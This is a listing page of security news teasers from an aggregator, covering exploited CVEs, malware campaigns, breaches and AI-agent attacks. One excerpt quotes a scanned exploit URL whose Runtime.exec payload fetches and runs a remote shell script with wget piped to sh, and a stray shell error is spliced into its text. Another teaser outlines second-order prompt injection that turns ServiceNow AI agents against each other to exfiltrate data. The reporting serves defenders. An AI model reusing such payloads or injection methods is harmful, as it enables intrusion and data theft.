Geek-Guy.com

Category: Exploits

Explore the latest software exploits, zero-day vulnerabilities, and security PoCs. Geek-Guy provides expert analysis on emerging threats and how to stay protected.

Exploits, Global Security News

Contagious Interview attackers go ‘full stack’ to fool developers

Researchers at Socket have uncovered more details of a sophisticated software supply-chain operation linked to the Contagious Interview campaign attacking developers who rely on packages from NPM. They report finding a “full stack” operation behind the attacks, where code hosting, package distribution, staging servers and command-and control (C2) infrastructure are orchestrated much like a legitimate…

Read more →

Breaking News, CISA, Exploits, Global Security News, hacking, ICS-SCADA, Security

U.S. CISA adds an OpenPLC ScadaBR flaw to its Known Exploited Vulnerabilities catalog

U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds an OpenPLC ScadaBR flaw to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added an OpenPLC ScadaBR flaw, tracked as CVE-2021-26829  (CVSS score of 5.4), to its Known Exploited Vulnerabilities (KEV) catalog. The vulnerability is a cross-site scripting (XSS) flaw that impacts Windows and Linux versions via system_settings.shtm.…

Read more →

Exploits, Global Security News, Security

Why security needs a step change to thwart cyber attacks amid surging innovation

As enterprise digitization accelerates to drive growth and meet customer expectations, it’s vital security leaders have the right tools and strategies to keep businesses secure. Take AI innovation for example. While its transformative impact is clear, security leaders must ensure these activities do not unwittingly widen “attack surfaces”. Beyond AI threats, issues such as unpatched…

Read more →

Exploits, Global Security News, Uncategorized

SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 73

Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape Malware Newsletter Analysis of ShadowPad Attack Exploiting WSUS Remote Code Execution Vulnerability (CVE-2025-59287)   Shai-Hulud 2.0 Supply Chain Attack: 25K+ npm Repos Exposed Spyware Allows Cyber Threat Actors to Target Users of Messaging Applications  Morphisec Thwarts Russian-Linked…

Read more →

Breaking News, Cybercrime, data breach, Exploits, Global Security News, hacking, hacking news

Security Affairs newsletter Round 552 by Pierluigi Paganini – INTERNATIONAL EDITION

A new round of the weekly Security Affairs newsletter has arrived! Every week, the best security articles from Security Affairs are free in your email box. Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press. Attackers stole member data from French Soccer Federation Thousands of sensitive secrets published on JSONFormatter and…

Read more →

Exploits, Global Security News

CISA Adds Actively Exploited XSS Bug CVE-2021-26829 in OpenPLC ScadaBR to KEV

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has updated its Known Exploited Vulnerabilities (KEV) catalog to include a security flaw impacting OpenPLC ScadaBR, citing evidence of active exploitation. The vulnerability in question is CVE-2021-26829 (CVSS score: 5.4), a cross-site scripting (XSS) flaw that affects Windows and Linux versions of the software via

Read more →

Cyberattacks, Cybercrime, Security, Exploits, Global Security News

RomCom tries dropping a not-so-romantic payload on Ukraine-linked US firms

US firms with ties to projects supporting Ukraine are being targeted by the Russia-aligned RomCom group, which is using fake software updates to drop the Mythic Agent onto victim systems. In September 2025, Arctic Wolf Labs detected a campaign against a US engineering firm that had reportedly worked on such projects. The attack began as…

Read more →

Breaking News, Exploits, Global Security News, hacking, hacking news, Security

Thousands of sensitive secrets published on JSONFormatter and CodeBeautify

Users of JSONFormatter and CodeBeautify leaked thousands of sensitive secrets, including credentials and private keys, WatchTowr warns. WatchTowr’s latest research reveals massive leaks of passwords, secrets, and keys across developer formatting platforms like JSONFormatter and CodeBeautify. Despite past incidents, exposed credentials remain rampant, sometimes even for critical systems. WatchTowr researchers highlight how easily sensitive data…

Read more →

Botnet, Breaking News, cyber crime, Exploits, Global Security News, hacking, malware

New Mirai variant ShadowV2 tests IoT exploits amid AWS disruption

ShadowV2, a new Mirai-based botnet, briefly targeted vulnerable IoT devices during October’s AWS outage, likely as a test run. During the late-October AWS disruption, FortiGuard Labs researchers observed the Mirai-based ‘ShadowV2’ malware exploiting IoT vulnerabilities across multiple countries and industries. The botnet was active only during the outage, suggesting a test run for future attacks.…

Read more →

Cyberattacks, Cybercrime, Security, Exploits, Global Security News

Neues ToddyCat-Toolkit greift Outlook und Microsoft-Token an

srcset=”https://b2b-contenthub.com/wp-content/uploads/2025/11/shutterstock_2108335628.jpg?quality=50&strip=all 5760w, https://b2b-contenthub.com/wp-content/uploads/2025/11/shutterstock_2108335628.jpg?resize=300%2C168&quality=50&strip=all 300w, https://b2b-contenthub.com/wp-content/uploads/2025/11/shutterstock_2108335628.jpg?resize=768%2C432&quality=50&strip=all 768w, https://b2b-contenthub.com/wp-content/uploads/2025/11/shutterstock_2108335628.jpg?resize=1024%2C576&quality=50&strip=all 1024w, https://b2b-contenthub.com/wp-content/uploads/2025/11/shutterstock_2108335628.jpg?resize=1536%2C864&quality=50&strip=all 1536w, https://b2b-contenthub.com/wp-content/uploads/2025/11/shutterstock_2108335628.jpg?resize=2048%2C1152&quality=50&strip=all 2048w, https://b2b-contenthub.com/wp-content/uploads/2025/11/shutterstock_2108335628.jpg?resize=1240%2C697&quality=50&strip=all 1240w, https://b2b-contenthub.com/wp-content/uploads/2025/11/shutterstock_2108335628.jpg?resize=150%2C84&quality=50&strip=all 150w, https://b2b-contenthub.com/wp-content/uploads/2025/11/shutterstock_2108335628.jpg?resize=854%2C480&quality=50&strip=all 854w, https://b2b-contenthub.com/wp-content/uploads/2025/11/shutterstock_2108335628.jpg?resize=640%2C360&quality=50&strip=all 640w, https://b2b-contenthub.com/wp-content/uploads/2025/11/shutterstock_2108335628.jpg?resize=444%2C250&quality=50&strip=all 444w” width=”1024″ height=”576″ sizes=”auto, (max-width: 1024px) 100vw, 1024px”>Die APT-Gruppe ToddyCat hat ihren Fokus auf den Diebstahl von Outlook-E-Mail-Daten und Microsoft 365-Zugriffstoken verlagert. IB Photography – shutterstock.com Forscher von Kaspersky Labs haben festgestellt, dass sich…

Read more →

Exploits, Global Security News

CSPM buyer’s guide: How to choose the best cloud security posture management tools

Cloud security posture management (CSPM) explained Cloud security posture management (CSPM) combines threat intelligence, detection, and remediation that works across complex collections of cloud-based applications. After companies move to the cloud, many are under the impression that their cloud hosting providers are solely responsible for security, a misconception that can lead to data breaches and…

Read more →

AI, Apps, Cybersecurity, data breach, Data Breaches, Exploits, Global Security News, hacking, Information Security, malware

Forget Firewalls — Hack the Supplier: The Iberia Attack Blueprint Revealed

On 23 November 2025, Iberia disclosed a security incident stemming from an unauthorized access to the systems of a third-party supplier / vendor.The airline communicated to impacted customers that certain personal data may have been exposed. According to the notification, exposed information may include first and last name, email address, and loyalty-card identification numbers (Iberia…

Read more →

APT, Breaking News, Exploits, Global Security News, intelligence, malware, Security

For the first time, a RomCom payload has been observed being distributed via SocGholish

RomCom malware used the SocGholish fake update loader to deliver Mythic Agent to a U.S. civil engineering firm. In September 2025, Arctic Wolf Labs observed RomCom threat actors delivering the Mythic Agent via SocGholish to a U.S. company. The researchers noticed that the payload executed about 10 minutes after initial exploitation, marking the first time…

Read more →

AI, API security, Cybersecurity, Endpoint, Exploits, Global Security News, malware, Network Security, Risk Management

When your AI Assistant Becomes the Attacker’s Command-and-Control

Earlier this month, Microsoft uncovered SesameOp, a new backdoor malware that abuses the OpenAI Assistants API as a covert command-and-control (C2) channel. The discovery has drawn significant attention within the cybersecurity community. Security teams can no longer focus solely on endpoint malware. Attackers are weaponizing public and legitimate AI assistant APIs and defenders must adjust.…

Read more →

AI, API security, Cybersecurity, Endpoint, Exploits, Global Security News, malware, Network Security, Risk Management

When your AI Assistant Becomes the Attacker’s Command-and-Control

Earlier this month, Microsoft uncovered SesameOp, a new backdoor malware that abuses the OpenAI Assistants API as a covert command-and-control (C2) channel. The discovery has drawn significant attention within the cybersecurity community. Security teams can no longer focus solely on endpoint malware. Attackers are weaponizing public and legitimate AI assistant APIs and defenders must adjust.…

Read more →

AI, API security, Cybersecurity, Endpoint, Exploits, Global Security News, malware, Network Security, Risk Management

When your AI Assistant Becomes the Attacker’s Command-and-Control

Earlier this month, Microsoft uncovered SesameOp, a new backdoor malware that abuses the OpenAI Assistants API as a covert command-and-control (C2) channel. The discovery has drawn significant attention within the cybersecurity community. Security teams can no longer focus solely on endpoint malware. Attackers are weaponizing public and legitimate AI assistant APIs and defenders must adjust.…

Read more →

AI, API security, Cybersecurity, Endpoint, Exploits, Global Security News, malware, Network Security, Risk Management

When your AI Assistant Becomes the Attacker’s Command-and-Control

Earlier this month, Microsoft uncovered SesameOp, a new backdoor malware that abuses the OpenAI Assistants API as a covert command-and-control (C2) channel. The discovery has drawn significant attention within the cybersecurity community. Security teams can no longer focus solely on endpoint malware. Attackers are weaponizing public and legitimate AI assistant APIs and defenders must adjust.…

Read more →

Commentary, critical infrastructure, Exploits, Global Security News, op-ed, operational technology, Technology

‘Stranger Things’ emerge when OT security is stuck in the past

The final season of “Stranger Things” is upon us, and 1980s nostalgia is at an all-time high. The clunky control panels at Hawkins Lab help set the stage for the show. The unfortunate reality is that similar legacy systems still exist in operational technology (OT) environments today. Just as Hawkins Lab spawned a monstrous compendium…

Read more →

Breaking News, cyber crime, Cybercrime, Exploits, Global Security News, hacking, malware

Dissecting a new malspam chain delivering Purelogs infostealer

The AISI Research Center’s Cybersecurity Observatory publishes the report “Dissecting a new malspam chain delivering Purelogs infostealer” – November 25, 2025. Organizational and personal security remains under constant threat from increasingly sophisticated attack vectors, with malspam continuing to represent one of the most widespread and effective initial infection vectors for distributing malware on a large…

Read more →

Exploits, Global Security News

New ClickFix attacks use fake Windows Update screens to fool employees

CSOs and Windows admins should disable the ability of personal computers to automatically run commands to block the latest version of the ClickFix social engineering attacks. This advice comes from researchers at Huntress, who this week warned that a new version of ClickFix-based attacks, where employees are tricked into running malicious commands, is circulating. The…

Read more →

AI, Artificial Intelligence (AI), Cybersecurity, Exploits, Global Security News, Research, Technology

Underground AI models promise to be hackers ‘cyber pentesting waifu’ 

As legitimate businesses purchase AI tools from some of the largest companies in the world, cybercriminals are accessing  an increasingly sophisticated underground market for custom LLMs designed to  assist with lower-level hacking tasks. In a report published Tuesday, Palo Alto Networks’ Unit 42 looked at how underground hacking forums advertise and sell custom, jailbroken, and…

Read more →

Exploits, Global Security News

CISA warns against unencrypted messaging

In an echo from this time last year, smartphone users are again being warned against sending unencrypted text messages by the US Cybersecurity and Infrastructure Security Agency (CISA). Warning in particular against nation-state attacks via messaging services aimed at high-value individuals, the latest updated CISA bulletin should be seen as a warning to us all. “Cyber threat actors are using…

Read more →

Breaking News, cyber crime, Exploits, Global Security News, hacking, malware, Security

Morphisec warns StealC V2 malware spread through weaponized blender files

StealC V2 spread via malicious Blender files on 3D model sites like CGTrader, abusing Blender’s ability to run hidden Python scripts. Cybersecurity firm Morphisec reported that Russian threat actors are spreading StealC V2 infostealer via weaponized Blender files uploaded to 3D model marketplaces like CGTrader. The malware abuses Blender’s ability to run Python scripts for automation…

Read more →

Breaking News, Exploits, Global Security News, intelligence, malware, Reports, Security

CISA: Spyware and RATs used to target WhatsApp and Signal Users

CISA warns that threat actors are actively using commercial spyware and RATs to target users of mobile messaging apps WhatsApp and Signal. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is warning of threat actors using commercial spyware and remote access trojans (RATs) to target users of popular instant messaging applications, including WhatsApp and Signal.…

Read more →

Cybersecurity, Exploits, GitHub, Global Security News, Research, Threats

Shai-Hulud worm returns stronger and more automated than ever before

Security researchers and authorities are warning about a fresh wave of supply-chain attacks linked to a self-replicating worm that attackers have injected into almost 500 npm (node.js package manager) software packages, exposing more than 26,000 open-source repositories on GitHub. The trojanized npm packages, which were first discovered late Sunday by Charlie Eriksen, security researcher at…

Read more →

Android, Cybersecurity and Infrastructure Security Agency (CISA), Exploits, Geopolitics, Global Security News, Government, privacy

CISA alert draws attention to spyware’s targeting of messaging apps

The Cybersecurity and Infrastructure Security Agency warned Monday about threat groups using commercial spyware to target messaging apps, and urged users to take protective steps. “CISA is aware of multiple cyber threat actors actively leveraging commercial spyware to target users of mobile messaging applications (apps),” the agency said in a brief online notice. “These cyber…

Read more →

Breaking News, cyber crime, Cybercrime, data breach, Exploits, Global Security News, Security

Harvard reports vishing breach exposing alumni and donor contact data

Harvard revealed its Alumni Affairs systems suffered a vishing breach, exposing emails, phone numbers, addresses, donation data and biographical info. Harvard revealed that threat actors breached its Alumni Affairs and Development systems through a vishing attack, exposing contact, donation, and biographical data of students, staff, alumni. Harvard says the breached systems held no Social Security…

Read more →

Exploits, Global Security News

Apple at NeurIPS: Why it matters

Apple’s decision to take part in (and co-sponsor) this year’s NeurIPS conference shows how the company is keeping close tabs on future trends in the field, highlights its willingness to cooperate, and shows Apple reaching out to recruit new expertise.  The company’s machine learning and artificial intelligence (AI) teams are deeply involved in the important event. Since…

Read more →

Exploits, Global Security News

Conflicts between URL mapping and URL based access control., (Mon, Nov 24th)

We continue to encounter high-profile vulnerabilities that relate to how URL mapping (or “aliases”) interac|zsh:1: parse error near `&’ ts with URL-based access control. Last week, we wrote about the Oracle Identity Manager vulnerability. I noticed some scans for an older vulnerability with similar roots today: /pentaho/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23%7BT(java.lang.Runtime).getRuntime().exec(‘wget%20-qO-%20http%3A%2F%2F[redacted]%2Frondo.pms.sh%7Csh’)%7D&mgrDn=a&pwd=a This request attempts to exploit a vulnerability in Hitachi Vantara…

Read more →

Breaking News, Exploits, Global Security News, hacking, hacking news, malware

Attackers deliver ShadowPad via newly patched WSUS RCE bug

Attackers exploited a patched WSUS flaw (CVE-2025-59287) to gain access, use PowerCat for a shell, and deploy the ShadowPad malware. AhnLab SEcurity intelligence Center (ASEC) researchers reported that threat actors exploited a recently patched WSUS flaw (CVE-2025-59287) to deliver the ShadowPad malware. ShadowPad is a backdoor widely used by China-linked APT groups and privately sold…

Read more →

Exploits, Global Security News, Identity and Access Management, Security, Vulnerabilities, Zero-Day Vulnerabilities

Oracle OIM zero‑day: Pre‑auth RCE forces rapid patching across enterprises

The Cybersecurity and Infrastructure Security Agency (CISA) has flagged a pre-authenticated, critical remote code execution flaw in Oracle Identity Manager (OIM), noting that it has been actively exploited, and added it to its Known Exploited Vulnerabilities (KEV) catalog. The flaw was first identified by Searchlight Cyber, which found it capable of allowing complete authentication bypass,…

Read more →

api, Commentary, Cybersecurity, Exploits, Global Security News, OAuth, op-ed

When trust turns toxic: Lessons from the Salesloft Drift incident

The recent Salesloft Drift breach offered a sobering reminder of how easily trust can be weaponized in today’s SaaS and AI-integrated environments. In this incident, hackers exploited the Drift chatbot, stole OAuth tokens, and used them to obtain data from CRM systems before the tokens could be revoked. In the wake of the incident, many…

Read more →

AI, Anthropic, Artificial Intelligence, Breaking News, Exploits, Global Security News, Security

AI attack agents are accelerators, not autonomous weapons: the Anthropic attack

Why today’s AI attack agents boost human attackers but still fall far from becoming real autonomous weapons. Anthropic recently published a report that sparked a lively debate about what AI agents can actually do during a cyberattack. The study shows an AI system, trained specifically for offensive tasks, handling 80–90% of the tactical workload in…

Read more →

Exploits, Global Security News

ShadowPad Malware Actively Exploits WSUS Vulnerability for Full System Access

A recently patched security flaw in Microsoft Windows Server Update Services (WSUS) has been exploited by threat actors to distribute malware known as ShadowPad. “The attacker targeted Windows Servers with WSUS enabled, exploiting CVE-2025-59287 for initial access,” AhnLab Security Intelligence Center (ASEC) said in a report published last week. “They then used PowerCat, an open-source

Read more →

Breaking News, Cybercrime, data breach, Exploits, Global Security News, hacking, hacking news

Security Affairs newsletter Round 551 by Pierluigi Paganini – INTERNATIONAL EDITION

A new round of the weekly Security Affairs newsletter has arrived! Every week, the best security articles from Security Affairs are free in your email box. Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press. BadAudio malware: how APT24 scaled its cyberespionage through supply chain attacks U.S. CISA adds an Oracle…

Read more →

Breaking News, Exploits, Global Security News, hacking, hacking news, IT Information Security, Security

SonicWall flags SSLVPN flaw allowing firewall crashes

SonicWall warns of a high-severity buffer overflow flaw in SonicOS SSLVPN (CVE-2025-40601) that lets attackers crash Gen7 and Gen8 firewalls. A new high-severity SonicOS SSLVPN flaw, tracked as CVE-2025-40601 (CVSS score of 7.5), allows attackers to crash SonicWall Gen7 and Gen8 firewalls. SonicWall is urging all customers to apply patches immediately, as the issue stems…

Read more →

Breaking News, CISA, Exploits, Global Security News, hacking, Security

U.S. CISA adds an Oracle Fusion Middleware flaw to its Known Exploited Vulnerabilities catalog

U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds an Oracle Fusion Middleware flaw to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a an Oracle Fusion Middleware flaw, tracked as CVE-2025-61757  (CVSS score of 9.8), to its Known Exploited Vulnerabilities (KEV) catalog. The vulnerability is a missing authentication for a critical function that…

Read more →

Exploits, Global Security News

CISA Warns of Actively Exploited Critical Oracle Identity Manager Zero-Day Vulnerability

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday added a critical security flaw impacting Oracle Identity Manager to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation. The vulnerability in question is CVE-2025-61757 (CVSS score: 9.8), a case of missing authentication for a critical function that can result in pre-authenticated

Read more →

Exploits, Global Security News, Security, Security Software, Threat and Vulnerability Management

How to turn threat intel into real security wins

Security leaders aren’t short of data, they’re short of decisions. Here’s how to turn threat feeds into an operating model that measurably reduces loss, accelerates response and earns board confidence. The problem isn’t data, it’s conversion Modern security operations centres ingest torrents of artefacts: Indicators of compromise, suspicious domains, sandbox reports, takedown notices and headlines…

Read more →

Breaking News, Exploits, Global Security News, hacking, hacking news, IT Information Security, Security

SolarWinds addressed three critical flaws in Serv-U

SolarWinds patched three critical vulnerabilities in its Serv-U file transfer solution that could allow remote code execution. SolarWinds addressed three critical vulnerabilities in its Serv-U file transfer solution that could allow remote code execution. The first vulnerability, tracked as CVE-2025-40549 (CVSS score 9.1), is a path restriction bypass issue that impacts Serv-U. An attacker with…

Read more →

Cyberattacks, Cybercrime, Data Breach, Security, Exploits, Global Security News

OAuth token compromise hits Salesforce ecosystem again, Gainsight impacted

Salesforce has disclosed yet another security incident involving unauthorized access to customer data through compromised third-party applications, this time implicating Gainsight-published apps connected to its platform through OAuth integrations. Salesforce said it detected unusual activity involving Gainsight applications that integrate with its customer relationship management platform. “Upon detecting the activity, Salesforce revoked all active access…

Read more →

Breaking News, cyber crime, data breach, Exploits, Global Security News, hacking

Massive data leak hits Italian railway operator Ferrovie dello Stato via Almaviva hack

Ferrovie dello Stato Italiane (FS) data leaked after a breach at IT provider Almaviva. A hacker claims the theft of 2.3 TB of sensitive data. Data belonging to Italy’s national railway operator Ferrovie dello Stato Italiane (FS) was leaked after a data breach at IT provider Almaviva. FS Italiane Group is Italy’s state-owned railway company, managing passenger…

Read more →

Exploits, Global Security News

Ransomware gangs find a new hostage: Your AWS S3 buckets

Cybersecurity researchers have issued fresh warnings about ransomware operators shifting their focus from traditional on-premises targets to cloud storage services, especially S3 buckets used by Amazon Web Services (AWS). A recent Trend Micro report outlined a new wave of attacks, where attackers integrate with cloud-native encryption and key management services rather than merely stealing or…

Read more →

Commentary, Cybersecurity, Exploits, FedRAMP, FISMA, Global Security News, Government

Legacy web forms are the weakest link in government data security

Federal, state, and local government agencies face a critical vulnerability hiding in plain sight: outdated web forms collecting citizen data through insecure channels. While agencies invest in perimeter security and threat detection, many continue using legacy forms built years ago without modern encryption, authentication, or compliance capabilities. These aging systems collect Social Security numbers, financial…

Read more →

Exploits, Global Security News

Sneaky2FA phishing tool adds ability to insert legit-looking URLs

Since the introduction of multi-factor authentication (MFA), threat actors have been finding ways to get around what can be an effective defense against phishing attacks. In their latest move, those behind the Sneaky2FA phishing-as-a-service (PhaaS) kit have added browser-in-the-browser (BITB) functionality to help crooks design phishing pages that fool victims. This function allows the crook…

Read more →

Exploits, Global Security News

Fortinet criticized for ‘silent’ patching after disclosing second zero-day vulnerability in same equipment

Only days after Fortinet was criticized by researchers for ‘silently’ patching a zero-day vulnerability without informing its customers, it has emerged that it did the same for a second zero-day that is being used as part of the same attack chain. This is a story of two zero-day vulnerabilities in the FortiWeb web application firewall…

Read more →

Exploits, Global Security News

ShadowRay 2.0 Exploits Unpatched Ray Flaw to Build Self-Spreading GPU Cryptomining Botnet

Oligo Security has warned of ongoing attacks exploiting a two-year-old security flaw in the Ray open-source artificial intelligence (AI) framework to turn infected clusters with NVIDIA GPUs into a self-replicating cryptocurrency mining botnet. The activity, codenamed ShadowRay 2.0, is an evolution of a prior wave that was observed between September 2023 and March 2024. The…

Read more →

AI, Android, android security, Cybersecurity, Exploits, Global Security News, privacy, Risk Management

Android Quick Share Support for AirDrop: A Secure Approach to Cross-Platform File Sharing

Posted by Dave Kleidermacher, VP, Platforms Security & Privacy, Google Technology should bring people closer together, not create walls. Being able to communicate and connect with friends and family should be easy regardless of the phone they use. That’s why Android has been building experiences that help you stay connected across platforms. As part of…

Read more →

AI, Android, android security, Cybersecurity, Exploits, Global Security News, privacy, Risk Management

Android Quick Share Support for AirDrop: A Secure Approach to Cross-Platform File Sharing

Posted by Dave Kleidermacher, VP, Platforms Security & Privacy, Google Technology should bring people closer together, not create walls. Being able to communicate and connect with friends and family should be easy regardless of the phone they use. That’s why Android has been building experiences that help you stay connected across platforms. As part of…

Read more →

Exploits, Global Security News

Oracle Identity Manager Exploit Observation from September (CVE-2025-61757), (Thu, Nov 20th)

Searchlight Cyber today released a blog detailing CVE-2025-61757, a vulnerability they reported to Oracle. Oracle released a patch for the vulnerability as part of its October Critical Patch Update, which was released on October 21st. Based on Searchlight Cyber’s blog, the issue is pretty trivial to exploit: All URLs that end in “.wadl” are exempt…

Read more →

Artificial Intelligence, Generative AI, Exploits, Global Security News

API-Exploit für AI-Browser Comet entdeckt

Sicherheitsforscher haben einen API-Exploit für den KI-Browser Comet offengelegt. Fajri Mulia Hidayat – shutterstock.com Der Security-Anbieter SquareX hat eine bisher nicht dokumentierte API innerhalb des KI-Browsers Comet offengelegt. Damit können beliebige Befehle über eingebettete Erweiterungen ausgeführt und Anwendungen gestartet werden – Funktionen, die von Mainstream-Browsern absichtlich blockiert werden. Die API lässt sich direkt von perplexity.ai…

Read more →

APT, Cyber warfare, Exploits, Global Security News, hacking, Security

Cyber-enabled kinetic targeting: Iran-linked actor uses cyber operations to support physical attacks

Iran-linked actors mapped ship AIS data ahead of a missile strike attempt, highlighting the rise of cyber operations enabling real-world attacks. Iran-linked threat actors mapped ship Automatic Identification System (AIS) data shortly before an attempted missile strike, showing how Tehran-aligned groups use cyber operations to support and amplify real-world kinetic attacks. The research demonstrates that…

Read more →

CISA, Exploits, Global Security News, Google Chromium, hacking, hacking news, Security

U.S. CISA adds a Google Chromium V8 flaw to its Known Exploited Vulnerabilities catalog

U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Google Chromium V8 flaw to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a Google Chromium V8 flaw, tracked as CVE-2025-13223, to its Known Exploited Vulnerabilities (KEV) catalog. This week, Google released Chrome security updates to address two flaws, including a high-severity V8 type confusion…

Read more →

Breaking News, Exploits, Global Security News, hacking, Security

7-Zip RCE flaw (CVE-2025-11001) actively exploited in attacks in the wild

A remote code execution vulnerability, tracked as CVE-2025-11001, in the 7-Zip software is under active exploitation. A new 7-Zip flaw tracked as CVE-2025-11001 (CVSS score of 7.0) is now being actively exploited in the wild, NHS England warns. Remote attackers can trigger the vulnerability to execute arbitrary code on affected installations of 7-Zip. “Active exploitation…

Read more →

Breaking News, cyber crime, Exploits, Global Security News, malware, Security

Operation WrtHug hijacks 50,000+ ASUS routers to Bìbuild global botnet

Operation WrtHug hijacks tens of thousands of outdated ASUS routers worldwide, mainly in Taiwan, the U.S., and Russia, forming a large botnet. A new campaign called Operation WrtHug has compromised tens of thousands of outdated or end-of-life ASUS routers worldwide, mainly in Taiwan, the U.S., and Russia, pulling them into a large malicious network. SecurityScorecard…

Read more →

Breaking News, cyber crime, Exploits, Global Security News, malware, Security

Operation WrtHug hijacks 50,000+ ASUS routers to build a global botnet

Operation WrtHug hijacks tens of thousands of outdated ASUS routers worldwide, mainly in Taiwan, the U.S., and Russia, forming a large botnet. A new campaign called Operation WrtHug has compromised tens of thousands of outdated or end-of-life ASUS routers worldwide, mainly in Taiwan, the U.S., and Russia, pulling them into a large malicious network. SecurityScorecard…

Read more →

Exploits, Global Security News

Hackers Actively Exploiting 7-Zip Symbolic Link–Based RCE Vulnerability (CVE-2025-11001)

A recently disclosed security flaw impacting 7-Zip has come under active exploitation in the wild, according to an advisory issued by the U.K. NHS England Digital on Tuesday. The vulnerability in question is CVE-2025-11001 (CVSS score: 7.0), which allows remote attackers to execute arbitrary code. It has been addressed in 7-Zip version 25.00 released in…

Read more →

Exploits, Global Security News, Security, Security Software, Threat and Vulnerability Management, Vulnerabilities

The nexus of risk and intelligence: How vulnerability-informed hunting uncovers what everything else misses

For years, I watched organizations treat vulnerability data like a compliance chore. It was something to scan, sort and patch against deadlines. Yet buried in those reports is a treasure map of sorts, where an attacker is likely to strike first. In my previous red team and incident responder roles, minus a credential leak or…

Read more →

Exploits, Global Security News

Hidden API in Comet AI browser raises security red flags for enterprises

SquareX has disclosed a previously undocumented API within the Comet AI browser that allows its embedded extensions to execute arbitrary commands and launch applications — capabilities mainstream browsers intentionally block. According to a disclosure shared with CSO ahead of its publication on Wednesday, Comet’s Analytics Extension contains a custom MCP API that bypasses the decade-old…

Read more →

Breaking News, CISA, Exploits, Global Security News, hacking, Security

U.S. CISA adds a new Fortinet FortiWeb flaw to its Known Exploited Vulnerabilities catalog

U.S. CISA has added a second Fortinet FortiWeb vulnerability in just a few days to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a Fortinet FortiWeb flaw, tracked as CVE-2025-58034 (CVSS score of 6.7), to its Known Exploited Vulnerabilities (KEV) catalog. This week, Fortinet patched a new FortiWeb zero-day, tracked…

Read more →

Exploits, Global Security News

ServiceNow AI Agents Can Be Tricked Into Acting Against Each Other via Second-Order Prompts

Malicious actors can exploit default configurations in ServiceNow’s Now Assist generative artificial intelligence (AI) platform and leverage its agentic capabilities to conduct prompt injection attacks. The second-order prompt injection, according to AppOmni, makes use of Now Assist’s agent-to-agent discovery to execute unauthorized actions, enabling attackers to copy and exfiltrate sensitive

Read more →

Exploits, Global Security News, hacking, Hacks, News, Website Security

Popular Ghost blogging platform experiences hack attack [OLD NEWS]

Unknown hackers hacked the Ghost blogging platform. In May 2020, the popular blogging platform Ghost faced a security scare after unknown hackers infiltrated their systems. This incident, while resolved quickly, highlighted the ever-present threat of cyberattacks and the importance of robust security measures. Ghost in the Machine: The Breach Explained The attack involved exploiting vulnerabilities…

Read more →

ANYRUN, Cybersecurity, Exploits, Global Security News, Malware Analysis

LOLBin Attacks Explained with Examples: Everything SOC Teams Need to Know 

Some attacks smash the door open. LOLBins just borrow your keys and walk right in.  They’re tricky because tools everyone trusts suddenly start doing things that don’t match their usual job; loading odd-looking modules, decoding files that shouldn’t need decoding, or quietly handing work off to hidden PowerShell scripts. At first glance it all feels…

Read more →

ANYRUN, Cybersecurity, Exploits, Global Security News, Malware Analysis

LOLBin Attacks Explained with Examples: Everything SOC Teams Need to Know 

Some attacks smash the door open. LOLBins just borrow your keys and walk right in.  They’re tricky because tools everyone trusts suddenly start doing things that don’t match their usual job; loading odd-looking modules, decoding files that shouldn’t need decoding, or quietly handing work off to hidden PowerShell scripts. At first glance it all feels…

Read more →

Breaking News, cyber crime, Cybercrime, data breach, Exploits, Global Security News, Security

Eurofiber confirms November 13 hack, data theft, and extortion attempt

Eurofiber says hackers exploited a flaw on November 13, breached its ticket and customer portals, stole data, and attempted extortion. On November 13, threat actors exploited a vulnerability to breach its ticketing system and ATE customer portal of the European fiber operator Eurofiber. Attackers stole data and attempted extortion. Eurofiber focuses on B2B digital infrastructure,…

Read more →

Cyber Threats, Exploits, Global Security News, online privacy, Tips & Hacks

10 Online Security Tips for Seniors

This post will show you online security tips for seniors. The Internet offers seniors a treasure trove of information, connections, and opportunities. However, navigating the online world safely is crucial. As cybercrime continues to rise, older adults need to be security-conscious while exploring the vast digital landscape. Cybercriminals are constantly devising new methods to exploit…

Read more →

Breaking News, Exploits, Fortinet, FortiWeb, Global Security News, hacking, Security

New FortiWeb zero-day CVE-2025-58034 under attack patched by Fortinet

Fortinet patched a new FortiWeb zero-day, tracked as CVE-2025-58034, which attackers are actively exploiting. Fortinet patched a new FortiWeb zero-day, tracked as CVE-2025-58034 (CVSS score 6.7), which is being actively exploited in attacks in the wild. Trend Micro researcher Jason McFadyen reported the vulnerability. The flaw is an improper neutralization of special elements used in…

Read more →

AI, Artificial Intelligence (AI), Cybersecurity, Exploits, Global Security News, Research

Hackers turn open-source AI framework into global cryptojacking operation

Malicious hackers have been attacking the development environment of an open-source AI framework, twisting its functions into a global cryptojacking bot for profit, according to researchers at cybersecurity firm Oligo. The flaw exists in an Application Programming Interface for Ray, an open-source framework for automating, scaling and optimizing compute resources that Oligo researchers called “Kubernetes…

Read more →

Breaking News, cyber crime, Cybercrime, data breach, Exploits, Global Security News

Pennsylvania Office of the Attorney General (OAG) confirms data breach after August attack

The Pennsylvania Office of the Attorney General (“OAG”) confirms a data breach following a ransomware attack by Inc Ransom group. The Pennsylvania Office of the Attorney General (“OAG”) confirmed a data breach following a ransomware attack attributed to Inc Ransom group. However, the organization did not share details about the security breach, either the number…

Read more →

Exploits, Global Security News

More work for admins as Google patches latest zero-day Chrome vulnerability

For the third time in recent months, Google has found itself scrambling to fix a potentially serious zero-day flaw in the Chrome browser’s V8 JavaScript engine. Addressed on Monday as part of an emergency ‘out-of-band’ patch, the vulnerability identified as CVE-2025-13223 was discovered by Clément Lecigne of Google’s in-house Threat Analysis Group (TAG). At some…

